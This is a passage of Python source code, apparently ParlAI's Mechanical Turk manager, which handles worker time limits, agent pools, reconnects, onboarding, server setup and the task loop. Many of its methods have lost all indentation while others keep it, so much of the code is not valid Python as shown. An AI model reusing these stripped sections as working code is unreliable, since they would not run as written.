        elapsed, un-time-blocking every worker recorded in it.

        :param init_load: use the long (daily) window rather than hourly
        :param force: reset regardless of elapsed time
        """
        # Uses a weak lock file to try to prevent clobbering between threads
        if not self._should_use_time_logs():
            return  # sandbox doesn't check logs
        file_path = os.path.join(parent_dir, TIME_LOGS_FILE_NAME)
        file_lock = os.path.join(parent_dir, TIME_LOGS_FILE_LOCK)
        with LockFile(file_lock) as _lock_file:
            assert _lock_file is not None
            if os.path.exists(file_path):
                with open(file_path, 'rb+') as time_log_file:
                    existing_times = pickle.load(time_log_file)
                # Initial loads should only reset if it's been a day,
                # otherwise only need to check an hour for safety
                compare_time = 24 * 60 * 60 if init_load else 60 * 60
                if time.time() - existing_times['last_reset'] < \
                        compare_time and not force:
                    return  # do nothing if it's been less than a day
                # every key except the reset stamp is a worker id to unblock
                reset_workers = list(existing_times.keys())
                reset_workers.remove('last_reset')
                if len(reset_workers) != 0:
                    self.worker_manager.un_time_block_workers(
                        reset_workers)
                # Reset the time logs
                os.remove(file_path)
            # new time logs
            with open(file_path, 'wb+') as time_log_file:
                time_logs = {'last_reset': time.time()}
                pickle.dump(time_logs, time_log_file,
                            pickle.HIGHEST_PROTOCOL)
def _log_working_time(self, mturk_agent):
if not self._should_use_time_logs():
return # sandbox does not log working time
additional_time = time.time() - mturk_agent.creation_time
worker_id = mturk_agent.worker_id
file_path = os.path.join(parent_dir, TIME_LOGS_FILE_NAME)
file_lock = os.path.join(parent_dir, TIME_LOGS_FILE_LOCK)
with LockFile(file_lock) as _lock_file:
assert _lock_file is not None
if not os.path.exists(file_path):
self._reset_time_logs()
with open(file_path, 'rb+') as time_log_file:
existing_times = pickle.load(time_log_file)
total_work_time = existing_times.get(worker_id, 0)
total_work_time += additional_time
existing_times[worker_id] = total_work_time
os.remove(file_path)
with open(file_path, 'wb+') as time_log_file:
pickle.dump(existing_times, time_log_file,
pickle.HIGHEST_PROTOCOL)
if total_work_time > int(self.opt.get('max_time')):
self.worker_manager.time_block_worker(worker_id)
def _move_agents_to_waiting(self, agents):
"""Put all agents into waiting worlds, expire them if no longer
accepting agents. If the agent is already final, clean it
"""
for agent in agents:
worker_id = agent.worker_id
assignment_id = agent.assignment_id
if agent.is_final():
agent.reduce_state()
self.socket_manager.close_channel(agent.get_connection_id())
continue
conversation_id = 'w_{}'.format(uuid.uuid4())
if self.accepting_workers:
# Move the worker into a waiting world
self.worker_manager.change_agent_conversation(
agent=agent,
conversation_id=conversation_id,
new_agent_id='waiting',
)
else:
self.force_expire_hit(worker_id, assignment_id)
def _expire_onboarding_pool(self):
"""Expire any agent that is in an onboarding thread"""
def expire_func(agent):
self.force_expire_hit(agent.worker_id, agent.assignment_id)
def is_onboard(agent):
return agent.get_status() == AssignState.STATUS_ONBOARDING
self.worker_manager.map_over_agents(expire_func, is_onboard)
def _expire_agent_pool(self):
"""Expire all workers in the worker pool"""
for agent in self.agent_pool.copy():
self.force_expire_hit(agent.worker_id, agent.assignment_id)
with self.agent_pool_change_condition:
self._remove_from_agent_pool(agent)
def _get_unique_pool(self, eligibility_function):
"""Return a filtered version of the worker pool where each worker is
only listed a maximum of one time. In sandbox this is overridden for
testing purposes, and the same worker can be returned more than once
"""
pool = [a for a in self.agent_pool if not a.hit_is_returned]
if eligibility_function['multiple'] is True:
agents = eligibility_function['func'](pool)
else:
agents = [a for a in pool if eligibility_function['func'](a)]
unique_agents = []
unique_worker_ids = []
for agent in agents:
if (self.is_sandbox) or (agent.worker_id not in unique_worker_ids):
unique_agents.append(agent)
unique_worker_ids.append(agent.worker_id)
return unique_agents
def _add_agent_to_pool(self, agent):
"""Add a single agent to the pool"""
if agent not in self.agent_pool:
# Add the agent to pool
with self.agent_pool_change_condition:
if agent not in self.agent_pool:
shared_utils.print_and_log(
logging.DEBUG,
"Adding worker {} to pool.".format(agent.worker_id)
)
self.agent_pool.append(agent)
    def _remove_from_agent_pool(self, agent):
        """Remove an agent from the pool.

        Callers must already hold `agent_pool_change_condition` when
        invoking this, as it mutates the shared pool directly.
        """
        assert agent in self.agent_pool, 'agent not in pool'
        self.agent_pool.remove(agent)
    def _handle_agent_disconnect(self, worker_id, assignment_id):
        """Mark a worker as disconnected and send a message to all agents in
        his conversation that a partner has disconnected.

        Delegates to the worker manager, passing
        `_handle_partner_disconnect` as the per-partner callback.
        """
        self.worker_manager.handle_agent_disconnect(
            worker_id, assignment_id, self._handle_partner_disconnect)
def _handle_partner_disconnect(self, agent):
"""Send a message to an agent notifying them that a partner has
disconnected and we marked the HIT as complete for them
"""
if agent is not None and not agent.is_final():
# Update the assignment state
agent.some_agent_disconnected = True
agent_messages = [m for m in agent.get_messages()
if 'id' in m and m['id'] == agent.id]
if len(agent_messages) < self.minimum_messages:
agent.set_status(AssignState.STATUS_PARTNER_DISCONNECT_EARLY)
else:
agent.set_status(AssignState.STATUS_PARTNER_DISCONNECT)
# Create and send the command
data = agent.get_inactive_command_data()
def disconnect_agent(*args):
self.socket_manager.close_channel(
agent.get_connection_id())
self.send_command(agent.worker_id, agent.assignment_id, data,
ack_func=disconnect_agent)
    def _restore_agent_state(self, worker_id, assignment_id):
        """Send a command to restore the state of an agent who reconnected.

        Spawns a daemon thread that waits for the frontend to report alive
        before replaying the stored messages and last command, then moves
        the agent back into its conversation.
        """
        agent = self.worker_manager._get_agent(worker_id, assignment_id)
        if agent is not None:
            # cleared here; set back to True when the next alive packet
            # from this agent's frontend is processed
            agent.alived = False
            def send_state_data():
                # wait until the frontend reconnects (or the hit expires)
                # so the restore command isn't sent into a dead channel
                while not agent.alived and not agent.hit_is_expired:
                    time.sleep(shared_utils.THREAD_SHORT_SLEEP)
                data = {
                    'text': data_model.COMMAND_RESTORE_STATE,
                    'messages': agent.get_messages(),
                    'last_command': agent.get_last_command(),
                }
                self.send_command(worker_id, assignment_id, data)
                # re-issue a message request that was pending at disconnect
                if agent.message_request_time is not None:
                    agent.request_message()
            state_thread = threading.Thread(
                name='restore-agent-{}'.format(agent.worker_id),
                target=send_state_data)
            state_thread.daemon = True
            state_thread.start()
            # Return an agent to their conversation, then restore the state
            self.worker_manager.change_agent_conversation(
                agent=agent,
                conversation_id=agent.conversation_id,
                new_agent_id=agent.id,
            )
    def _setup_socket(self, timeout_seconds=None):
        """Set up a socket_manager with defined callbacks.

        :param timeout_seconds: passed through as socket_dead_timeout —
            how long a quiet socket lives before being considered dead
        """
        assert self.task_state >= self.STATE_INIT_RUN, \
            'socket cannot be set up until run is started'
        socket_server_url = self.server_url
        if (self.opt['local']):  # skip some hops for local stuff
            socket_server_url = "https://localhost"
        # Wire this manager's alive/message/death handlers into the socket
        # layer; a dead server triggers a full shutdown.
        self.socket_manager = SocketManager(
            socket_server_url,
            self.port,
            self._on_alive,
            self._on_new_message,
            self._on_socket_dead,
            self.task_group_id,
            socket_dead_timeout=timeout_seconds,
            server_death_callback=self.shutdown,
        )
    def _on_alive(self, pkt):
        """Update MTurkManager's state when a worker sends an
        alive packet. This asks the socket manager to open a new channel and
        then handles ensuring the worker state is consistent.

        Two broad paths: a brand-new assignment for this worker (validate
        constraints, then assign a task and start onboarding), or a
        reconnect (reconcile the agent's status with the conversation id
        the frontend reports).
        """
        shared_utils.print_and_log(
            logging.DEBUG,
            'on_agent_alive: {}'.format(pkt)
        )
        worker_id = pkt.data['worker_id']
        hit_id = pkt.data['hit_id']
        assign_id = pkt.data['assignment_id']
        conversation_id = pkt.data['conversation_id']
        if not assign_id:
            # invalid assignment_id is an auto-fail
            shared_utils.print_and_log(
                logging.WARN,
                'Agent ({}) with no assign_id called alive'.format(worker_id)
            )
            return
        # Open a channel if it doesn't already exist
        self.socket_manager.open_channel(worker_id, assign_id)
        # Get a state for this worker, create if non existing
        worker_state = self.worker_manager.worker_alive(worker_id)
        if self.db_logger is not None:
            self.db_logger.log_worker_note(
                worker_id, assign_id,
                'Reconnected with conversation_id {} at {}'.format(
                    conversation_id, time.time()))
        if not worker_state.has_assignment(assign_id):
            # New connection for the worker. First ensure that this connection
            # isn't violating our uniqueness constraints
            completed_assignments = worker_state.completed_assignments()
            max_hits = self.max_hits_per_worker
            # NOTE(review): `completed_assignments > max_hits` permits one
            # assignment beyond max_hits_per_worker; `>=` may have been the
            # intent — confirm before changing.
            if ((self.is_unique and completed_assignments > 0) or
                    (max_hits != 0 and completed_assignments > max_hits)):
                text = (
                    'You have already participated in this HIT the maximum '
                    'number of times. This HIT is now expired. '
                    'Please return the HIT.'
                )
                self.force_expire_hit(worker_id, assign_id, text)
                return
            # Ensure we are still accepting workers
            if not self.accepting_workers:
                self.force_expire_hit(worker_id, assign_id)
                return
            # Ensure worker has not exceeded concurrent convo cap
            convs = worker_state.active_conversation_count()
            allowed_convs = self.opt['allowed_conversations']
            if allowed_convs > 0 and convs >= allowed_convs:
                text = ('You can participate in only {} of these HITs at '
                        'once. Please return this HIT and finish your '
                        'existing HITs before accepting more.'.format(
                            allowed_convs
                        ))
                self.force_expire_hit(worker_id, assign_id, text)
                return
            # Initialize a new agent for this worker
            self.worker_manager.assign_task_to_worker(
                hit_id, assign_id, worker_id
            )
            if self.db_logger is not None:
                self.db_logger.log_worker_accept_assignment(
                    worker_id, assign_id, hit_id)
            agent = self.worker_manager._get_agent(worker_id, assign_id)
            self._onboard_new_agent(agent)
        else:
            # Reconnecting worker: reconcile stored status against the
            # conversation the frontend says it is in
            agent = self.worker_manager._get_agent(worker_id, assign_id)
            agent.log_reconnect()
            agent.alived = True
            conversation_id = agent.conversation_id
            if agent.get_status() == AssignState.STATUS_NONE:
                # See if assigned an onboarding world, update state if so
                if self.is_onboarding_world(conversation_id):
                    agent.set_status(AssignState.STATUS_ONBOARDING)
                    return
                if self.is_waiting_world(conversation_id):
                    agent.set_status(AssignState.STATUS_WAITING)
                    self._add_agent_to_pool(agent)
                    return
                # Reconnecting before even being given a world. Kill the hit
                # so that on a reconnect they can get a new one assigned and
                # the resources of the first one are cleaned.
                self.force_expire_hit(worker_id, assign_id)
                return
            elif agent.get_status() == AssignState.STATUS_ONBOARDING:
                # See if moved to a waiting world, update state if so
                if self.is_waiting_world(conversation_id):
                    agent.set_status(AssignState.STATUS_WAITING)
                    self._add_agent_to_pool(agent)
                    return
                # Reconnecting to the onboarding world should either restore
                # state or expire (if workers are no longer being accepted
                # for this task)
                if not self.accepting_workers:
                    self.force_expire_hit(worker_id, assign_id)
                elif not conversation_id:
                    self._restore_agent_state(worker_id, assign_id)
            elif agent.get_status() == AssignState.STATUS_WAITING:
                if self.is_task_world(conversation_id):
                    agent.set_status(AssignState.STATUS_IN_TASK)
                    agent.clear_messages()
                    return
                # Reconnecting in waiting is either the first reconnect after
                # being told to wait or a waiting reconnect. Restore state if
                # no information is held, and add to the pool if not already in
                # the pool
                if not conversation_id:
                    self._restore_agent_state(worker_id, assign_id)
                self._add_agent_to_pool(agent)
            elif agent.get_status() == AssignState.STATUS_IN_TASK:
                if self.is_waiting_world(conversation_id):
                    agent.set_status(AssignState.STATUS_WAITING)
                    self._add_agent_to_pool(agent)
                    return
                # Reconnecting to the onboarding world or to a task world
                # should resend the messages already in the conversation
                if not conversation_id:
                    self._restore_agent_state(worker_id, assign_id)
            elif (agent.get_status() == AssignState.STATUS_DISCONNECT or
                  agent.get_status() == AssignState.STATUS_DONE or
                  agent.get_status() == AssignState.STATUS_EXPIRED or
                  agent.get_status() == AssignState.STATUS_RETURNED or
                  agent.get_status() == AssignState.STATUS_PARTNER_DISCONNECT):
                # inform the connecting user in all of these cases that the
                # task is no longer workable, use appropriate message
                data = agent.get_inactive_command_data()
                def disconnect_agent(*args):
                    self.socket_manager.close_channel(
                        agent.get_connection_id())
                self.send_command(worker_id, assign_id, data,
                                  ack_func=disconnect_agent)
def _handle_mturk_message(self, pkt):
assignment_id = pkt.assignment_id
agent = self.worker_manager.get_agent_for_assignment(assignment_id)
if agent is None:
return
mturk_event_type = pkt.data['text']
if mturk_event_type == SNS_ASSIGN_RETURNED:
agent.hit_is_returned = True
# Treat as a socket_dead event
self._on_socket_dead(agent.worker_id, assignment_id)
elif mturk_event_type == SNS_ASSIGN_ABANDONDED:
agent.set_hit_is_abandoned()
# Treat as a socket_dead event
self._on_socket_dead(agent.worker_id, assignment_id)
elif mturk_event_type == SNS_ASSIGN_SUBMITTED:
# Socket dead already called, just mark as complete
agent.hit_is_complete = True
def _on_new_message(self, pkt):
"""Handle incoming messages from Amazon's SNS queue. All other packets
should be handled by the worker_manager
"""
if pkt.sender_id == AMAZON_SNS_NAME:
self._handle_mturk_message(pkt)
return
self.worker_manager.route_packet(pkt)
    def _on_socket_dead(self, worker_id, assignment_id):
        """Handle a disconnect event, update state as required and notifying
        other agents if the disconnected agent was in conversation with them
        returns False if the socket death should be ignored and the socket
        should stay open and not be considered disconnected

        NOTE(review): despite the docstring above, no path in this body
        actually returns False — confirm whether callers rely on that.
        """
        agent = self.worker_manager._get_agent(worker_id, assignment_id)
        if agent is None:
            # This worker never registered, so we don't do anything
            return
        shared_utils.print_and_log(
            logging.DEBUG,
            'Worker {} disconnected from {} in status {}'.format(
                worker_id,
                agent.conversation_id,
                agent.get_status()
            )
        )
        if agent.get_status() == AssignState.STATUS_NONE:
            # Agent never made it to onboarding, delete
            agent.set_status(AssignState.STATUS_DISCONNECT)
            agent.reduce_state()
        elif agent.get_status() == AssignState.STATUS_ONBOARDING:
            # Agent never made it to task pool, the onboarding thread will die
            # and delete the agent if we mark it as a disconnect
            agent.set_status(AssignState.STATUS_DISCONNECT)
            agent.reduce_state()
            agent.disconnected = True
        elif agent.get_status() == AssignState.STATUS_WAITING:
            # agent is in pool, remove from pool and delete
            if agent in self.agent_pool:
                with self.agent_pool_change_condition:
                    self._remove_from_agent_pool(agent)
            agent.set_status(AssignState.STATUS_DISCONNECT)
            agent.reduce_state()
            agent.disconnected = True
        elif agent.get_status() == AssignState.STATUS_IN_TASK:
            # partner(s) must be notified of the disconnect
            self._handle_agent_disconnect(worker_id, assignment_id)
            agent.disconnected = True
        elif agent.get_status() == AssignState.STATUS_DONE:
            # It's okay if a complete assignment socket dies, but wait for the
            # world to clean up the resource
            return
        self.socket_manager.close_channel(agent.get_connection_id())
def _onboard_new_agent(self, mturk_agent):
"""Handle creating an onboarding thread and moving an agent through
the onboarding process, updating the state properly along the way
Returns True if a thread is launched, False if the call is ignored.
"""
# get state variable in question
worker_id = mturk_agent.worker_id
assignment_id = mturk_agent.assignment_id
def _onboard_function(mturk_agent):
"""Onboarding wrapper to set state to onboarding properly"""
if self.onboard_function:
conversation_id = 'o_' + str(uuid.uuid4())
self.worker_manager.change_agent_conversation(
agent=mturk_agent,
conversation_id=conversation_id,
new_agent_id='onboarding',
)
# Wait for turker to be in onboarding status
did_arrive = \
mturk_agent.wait_for_status(AssignState.STATUS_ONBOARDING)
if not did_arrive:
return
# call onboarding function
save_data = self.onboard_function(mturk_agent)
if save_data is not None:
MTurkDataHandler.save_world_data(
save_data, self.task_group_id,
conversation_id, sandbox=self.is_sandbox)
# once onboarding is done, move into a waiting world
self._move_agents_to_waiting([mturk_agent])
if assignment_id in self.assignment_to_onboard_thread:
if self.assignment_to_onboard_thread[assignment_id].isAlive():
return False
agent = self.worker_manager.get_agent_for_assignment(assignment_id)
# Only start an onboarding world if the worker never got a world
if agent.get_status() != AssignState.STATUS_NONE:
return False
# Start the onboarding thread and run it
onboard_thread = threading.Thread(
target=_onboard_function,
args=(mturk_agent,),
name='onboard-{}-{}'.format(worker_id, assignment_id)
)
onboard_thread.daemon = True
onboard_thread.start()
self.assignment_to_onboard_thread[assignment_id] = onboard_thread
return True
def _no_agents_incomplete(self, agents):
"""Return True if all the given agents completed their task"""
for agent in agents:
if not agent.is_final() or agent.get_status() != \
AssignState.STATUS_DONE:
return False
return True
def _check_time_limit(self):
if time.time() - self.time_limit_checked < RESET_TIME_LOG_TIMEOUT:
return
if int(time.time()) % (60 * 60 * 24) > (60 * 30):
# sync the time resets to ONCE DAILY in a 30 minute window
return
self.time_limit_checked = time.time()
self._reset_time_logs()
self.worker_manager.un_time_block_workers()
def is_onboarding_world(self, conversation_id):
return conversation_id is not None and conversation_id.startswith('o_')
def is_waiting_world(self, conversation_id):
return conversation_id is not None and conversation_id.startswith('w_')
def is_task_world(self, conversation_id):
return conversation_id is not None and conversation_id.startswith('t_')
# Manager Lifecycle Functions #
def populate_legacy_task_files(self, task_directory_path):
# Poplulate files to copy over to the server
if not self.task_files_to_copy:
self.task_files_to_copy = []
if not task_directory_path:
task_directory_path = os.path.join(
self.opt['parlai_home'],
'parlai',
'mturk',
'tasks',
self.opt['task']
)
self.task_files_to_copy.append(
os.path.join(task_directory_path, 'html', 'cover_page.html'))
try:
for file_name in os.listdir(os.path.join(
task_directory_path, 'html')):
self.task_files_to_copy.append(os.path.join(
task_directory_path, 'html', file_name
))
except FileNotFoundError: # noqa F821 we don't support python2
# No html dir exists
pass
for mturk_agent_id in self.mturk_agent_ids + ['onboarding']:
self.task_files_to_copy.append(os.path.join(
task_directory_path,
'html',
'{}_index.html'.format(mturk_agent_id)
))
def populate_task_files(self, task_directory_path):
# Poplulate files to copy over to the server
if not self.task_files_to_copy:
self.task_files_to_copy = {
'static': [],
'components': [],
'css': [],
'needs_build': None,
}
if not task_directory_path:
task_directory_path = os.path.join(
self.opt['parlai_home'],
'parlai',
'mturk',
'tasks',
self.opt['task']
)
self.task_files_to_copy['static'].append(os.path.join(
task_directory_path, 'frontend', 'static', 'cover_page.html'))
try:
frontend_contents = os.listdir(
os.path.join(task_directory_path, 'frontend'))
if 'package.json' in frontend_contents:
# We take a package file to mean that this component will
# need to be built separately before importing
self.task_files_to_copy['needs_build'] = \
os.path.join(task_directory_path, 'frontend')
for dir in frontend_contents:
if dir in self.task_files_to_copy:
for file_name in os.listdir(os.path.join(
task_directory_path, 'frontend', dir)):
self.task_files_to_copy[dir].append(os.path.join(
task_directory_path, 'frontend', dir, file_name
))
except FileNotFoundError: # noqa F821 we don't support python2
# No frontend dir exists
pass
    def setup_server(self, task_directory_path=None):
        """Prepare the MTurk server for the new HIT we would like to submit.

        Walks the user through an interactive confirmation of the run and
        its cost, checks the account balance, surfaces any notices from the
        parlai site, then deploys the task files (legacy or react frontend)
        to a fresh server.

        :param task_directory_path: directory to copy task files from;
            defaults to the task named in opt
        """
        assert self.task_state >= self.STATE_CREATED
        fin_word = 'start'
        if self.opt['count_complete']:
            fin_word = 'finish'
        shared_utils.print_and_log(
            logging.INFO,
            '\nYou are going to allow workers from Amazon Mechanical Turk to '
            'be an agent in ParlAI.\nDuring this process, Internet connection '
            'is required, and you should turn off your computer\'s auto-sleep '
            'feature.',
            should_print=True,
        )
        # Explain the HIT-creation strategy (all-up-front vs over time)
        if self.opt['max_connections'] == 0:
            shared_utils.print_and_log(
                logging.INFO,
                'Enough HITs will be created to fulfill {} times the '
                'number of conversations requested, extra HITs will be expired'
                ' once the desired conversations {}.'
                ''.format(HIT_MULT, fin_word),
                should_print=True,
            )
        else:
            shared_utils.print_and_log(
                logging.INFO,
                'Enough HITs will be launched over time '
                'up to a max of {} times the amount requested until the '
                'desired number of conversations {}.'
                ''.format(HIT_MULT, fin_word),
                should_print=True,
            )
        input('Please press Enter to continue... ')
        shared_utils.print_and_log(logging.NOTSET, '', True)
        if self.opt['local'] is True:
            shared_utils.print_and_log(
                logging.INFO,
                "In order to run the server locally, you will need "
                "to have a public HTTPS endpoint (SSL signed) running on "
                "the server you are currently excecuting ParlAI on. Enter "
                "that public URL hostname when prompted and ensure that the "
                "port being used by ParlAI (usually 3000) has external "
                "traffic routed to it.",
                should_print=True,
            )
            input('Please press Enter to continue... ')
        mturk_utils.setup_aws_credentials()
        # See if there's enough money in the account to fund the HITs requested
        num_assignments = self.required_hits
        payment_opt = {
            'type': 'reward',
            'num_total_assignments': num_assignments,
            'reward': self.opt['reward'],  # in dollars
        }
        total_cost = mturk_utils.calculate_mturk_cost(payment_opt=payment_opt)
        if not mturk_utils.check_mturk_balance(
                balance_needed=total_cost,
                is_sandbox=self.opt['is_sandbox']):
            raise SystemExit('Insufficient funds')
        # Costly live runs require typing the exact dollar amount to confirm
        if ((not self.opt['is_sandbox']) and
                (total_cost > 100 or self.opt['reward'] > 1)):
            confirm_string = '$%.2f' % total_cost
            expected_cost = total_cost / HIT_MULT
            expected_string = '$%.2f' % expected_cost
            shared_utils.print_and_log(
                logging.INFO,
                'You are going to create {} HITs at {} per assignment, for a '
                'total cost up to {} after MTurk fees. Please enter "{}" to '
                'confirm and continue, and anything else to cancel.\nNote that'
                ' of the {}, the target amount to spend is {}.'.format(
                    self.required_hits,
                    '$%.2f' % self.opt['reward'],
                    confirm_string,
                    confirm_string,
                    confirm_string,
                    expected_string
                ),
                should_print=True
            )
            check = input('Enter here: ')
            if (check != confirm_string and ('$' + check) != confirm_string):
                raise SystemExit('Cancelling')
        # Check to see if there are any additional notices on the parlai site
        if not self.is_test:
            shared_utils.print_and_log(
                logging.INFO,
                'Querying the parlai website for possible notices...',
                should_print=True)
            endpoint = 'sandbox' if self.is_sandbox else 'live'
            notice_url = PARLAI_MTURK_NOTICE_URL + endpoint
            try:
                import parlai_internal.mturk.configs as local_configs
                notice_url = local_configs.get_true_url(notice_url)
            except Exception:
                # not all users will be drawing configs from internal settings
                pass
            resp = requests.post(notice_url)
            warnings = resp.json()
            for warn in warnings:
                print('Notice: ' + warn)
                accept = input('Continue? (Y/n): ')
                if accept == 'n':
                    raise SystemExit('Additional notice was rejected.')
        self.logging_permitted = self._logging_permission_check()
        shared_utils.print_and_log(logging.INFO, 'Setting up MTurk server...',
                                   should_print=True)
        self.is_unique = self.opt['unique_worker']
        self.max_hits_per_worker = self.opt.get('max_hits_per_worker', 0)
        mturk_utils.create_hit_config(
            opt=self.opt,
            task_description=self.opt['task_description'],
            unique_worker=self.is_unique,
            is_sandbox=self.opt['is_sandbox']
        )
        # Setup the server with a likely-unique app-name
        task_name = '{}-{}'.format(str(uuid.uuid4())[:8], self.opt['task'])
        self.server_task_name = \
            ''.join(e for e in task_name.lower() if e.isalnum() or e == '-')
        if 'heroku_team' in self.opt:
            heroku_team = self.opt['heroku_team']
        else:
            heroku_team = None
        # Deploy the matching frontend flavor
        if self.opt.get('frontend_version', 0) < 1:
            self.populate_legacy_task_files(task_directory_path)
            self.server_url = server_utils.setup_legacy_server(
                self.server_task_name, self.task_files_to_copy,
                self.opt['local'], heroku_team, self.opt['hobby'])
        else:
            self.populate_task_files(task_directory_path)
            self.server_url = server_utils.setup_server(
                self.server_task_name, self.task_files_to_copy,
                self.opt['local'], heroku_team, self.opt['hobby'])
        shared_utils.print_and_log(logging.INFO, self.server_url)
        shared_utils.print_and_log(logging.INFO, "MTurk server setup done.\n",
                                   should_print=True)
        self.task_state = self.STATE_SERVER_ALIVE
    def start_new_run(self):
        """Clear state to prepare for a new run.

        Assigns a fresh run_id/task_group_id, resets all per-run state, and
        (best-effort) subscribes an SNS topic for HIT event notifications.
        """
        assert self.task_state >= self.STATE_SERVER_ALIVE, \
            'Cannot start a run before having a running server using ' \
            '`mturk_manager.setup_server()` first.'
        self.run_id = str(int(time.time()))
        self.task_group_id = '{}_{}'.format(self.opt['task'], self.run_id)
        self._init_state()
        try:
            self.topic_arn = mturk_utils.setup_sns_topic(
                self.opt['task'],
                self.server_url,
                self.task_group_id
            )
        except Exception:
            # SNS registration is non-fatal; the run continues without
            # HIT event callbacks
            self.topic_arn = None
            shared_utils.print_and_log(
                logging.WARN,
                'Botocore couldn\'t subscribe to HIT events, '
                'perhaps you tried to register to localhost?',
                should_print=True
            )
        if self.db_logger is not None:
            self.db_logger.log_new_run(self.required_hits, self.opt['task'])
        self.task_state = self.STATE_INIT_RUN
def ready_to_accept_workers(self, timeout_seconds=None):
"""Set up socket to start communicating to workers"""
assert self.task_state >= self.STATE_INIT_RUN, \
'Cannot be ready to accept workers before starting a run with ' \
'`mturk_manager.start_new_run()` first.'
shared_utils.print_and_log(logging.INFO,
'Local: Setting up WebSocket...',
not self.is_test)
self._setup_socket(timeout_seconds=timeout_seconds)
shared_utils.print_and_log(logging.INFO, 'WebSocket set up!',
should_print=True)
# Just in case create_hits was called first. To be removed when that
# workflow is no longer supported
if self.STATE_ACCEPTING_WORKERS > self.task_state:
self.task_state = self.STATE_ACCEPTING_WORKERS
    def set_onboard_function(self, onboard_function):
        """Register the function run for each agent during onboarding.

        The function receives the MTurk agent and may return world data to
        be saved; when left unset (falsy) the onboarding step is skipped
        and agents move straight to waiting.
        """
        self.onboard_function = onboard_function
    def start_task(self, eligibility_function, assign_role_function,
                   task_function):
        """Handle running a task by checking to see when enough agents are
        in the pool to start an instance of the task. Continue doing this
        until the desired number of conversations is had.

        :param eligibility_function: either a callable taking one worker and
            returning whether they may join, or a dict with keys 'func' and
            (optionally) 'multiple' — when 'multiple' is set, 'func' filters
            a list of workers instead of judging one at a time.
        :param assign_role_function: callable that assigns an id/role to each
            agent selected for a conversation; agents left with id None are
            dropped from the conversation.
        :param task_function: callable run (in its own thread) for each
            conversation with kwargs mturk_manager, opt, workers.
        """
        assert self.task_state >= self.STATE_HITS_MADE, \
            'Must have launched HITs with `mturk_manager.create_hits`' \
            ' to start the task'
        if callable(eligibility_function):
            # Convert legacy eligibility_functions to the new format
            eligibility_function = {
                'multiple': False,
                'func': eligibility_function,
            }
        else:
            # Ensure the eligibility function is valid
            if 'func' not in eligibility_function:
                shared_utils.print_and_log(
                    logging.CRITICAL,
                    "eligibility_function has no 'func'. Cancelling."
                )
                raise Exception(
                    'eligibility_function dict must contain a `func` field '
                    'containing the actual function.'
                )
            elif not callable(eligibility_function['func']):
                shared_utils.print_and_log(
                    logging.CRITICAL,
                    "eligibility_function['func'] not a function. Cancelling."
                )
                raise Exception(
                    "eligibility_function['func'] must contain a function. "
                    "If eligibility_function['multiple'] is set, it should "
                    "filter through the list of workers and only return those "
                    "that are currently eligible to participate. If it is not "
                    "set, it should take in a single worker and return whether"
                    " or not they are eligible."
                )
            if 'multiple' not in eligibility_function:
                eligibility_function['multiple'] = False

        def _task_function(opt, agents, conversation_id):
            """Wait for agents to join the world, then run task function"""
            shared_utils.print_and_log(
                logging.INFO,
                'Starting task {}...'.format(conversation_id)
            )
            shared_utils.print_and_log(
                logging.DEBUG,
                'Waiting for all agents to join the conversation...'
            )
            start_time = time.time()
            while True:
                all_joined = True
                for agent in agents:
                    # check the status of an individual agent assignment
                    if agent.get_status() != AssignState.STATUS_IN_TASK:
                        all_joined = False
                if all_joined:
                    break
                if time.time() - start_time > WORLD_START_TIMEOUT:
                    # We waited but not all agents rejoined, throw agents
                    # back into the waiting pool. Stragglers will disconnect
                    # from there
                    shared_utils.print_and_log(
                        logging.INFO,
                        'Timeout waiting for {}, move back to waiting'.format(
                            conversation_id
                        )
                    )
                    self._move_agents_to_waiting(agents)
                    return
                time.sleep(shared_utils.THREAD_SHORT_SLEEP)
            shared_utils.print_and_log(
                logging.INFO,
                'All agents joined the conversation {}!'.format(
                    conversation_id
                )
            )
            self.started_conversations += 1
            save_data = \
                task_function(mturk_manager=self, opt=opt, workers=agents)
            if save_data is not None:
                MTurkDataHandler.save_world_data(
                    save_data, self.task_group_id, conversation_id,
                    sandbox=self.is_sandbox)
            # Delete extra state data that is now unneeded
            for agent in agents:
                agent.clear_messages()
            # Count if it's a completed conversation
            if self._no_agents_incomplete(agents):
                self.completed_conversations += 1
            if self.opt['max_connections'] > 0:  # If using a conv cap
                if self.accepting_workers:  # if still looking for new agents
                    for agent in agents:
                        if agent.submitted_hit():
                            # replace the consumed HIT to keep the cap full
                            self.create_additional_hits(1)

        if self.db_logger is not None:
            self._maintain_hit_status()
        # Loop forever starting task worlds until desired convos are had
        while not self.is_shutdown:
            if self.has_time_limit:
                self._check_time_limit()
            with self.agent_pool_change_condition:
                valid_agents = self._get_unique_pool(eligibility_function)
                needed_agents = len(self.mturk_agent_ids)
                if len(valid_agents) >= needed_agents:
                    # enough agents in pool to start new conversation
                    self.conversation_index += 1
                    new_conversation_id = \
                        't_{}'.format(self.conversation_index)
                    # Add the required number of valid agents to the conv
                    agents = [a for a in valid_agents[:needed_agents]]
                    assign_role_function(agents)
                    # Allow task creator to filter out agents and run
                    # versions of the task that require fewer agents
                    agents = [a for a in agents if a.id is not None]
                    for agent in agents:
                        self.worker_manager.change_agent_conversation(
                            agent=agent,
                            conversation_id=new_conversation_id,
                            new_agent_id=agent.id,
                        )
                        # Remove selected agents from the pool
                        self._remove_from_agent_pool(agent)
                    # Start a new thread for this task world
                    task_thread = threading.Thread(
                        target=_task_function,
                        args=(self.opt, agents, new_conversation_id),
                        name='task-{}'.format(new_conversation_id)
                    )
                    task_thread.daemon = True
                    task_thread.start()
                    self.task_threads.append(task_thread)
            # Once we've had enough conversations, finish and break
            compare_count = self.started_conversations
            if (self.opt['count_complete']):
                compare_count = self.completed_conversations
            if compare_count >= self.num_conversations:
                self.accepting_workers = False
                self.expire_all_unassigned_hits()
                self._expire_onboarding_pool()
                self._expire_agent_pool()
                # Wait for all conversations to finish, then break from
                # the while loop
                for thread in self.task_threads:
                    thread.join()
                break
            time.sleep(shared_utils.THREAD_MEDIUM_SLEEP)
def _wait_for_task_expirations(self):
"""Wait for the full task duration to ensure anyone who sees the task
has it expired, and ensures that all tasks are properly expired
"""
start_time = time.time()
min_wait = self.opt['assignment_duration_in_seconds']
while time.time() - start_time < min_wait and \
len(self.hit_id_list) > 0:
self.expire_all_unassigned_hits()
time.sleep(
max(self.opt['assignment_duration_in_seconds'] / 60, 0.1)
)
    def shutdown(self, force=False):
        """Handle any mturk client shutdown cleanup.

        :param force: when True, run cleanup even if shutdown already ran.
        """
        # Ensure all threads are cleaned and state and HITs are handled
        if self.is_shutdown and not force:
            return
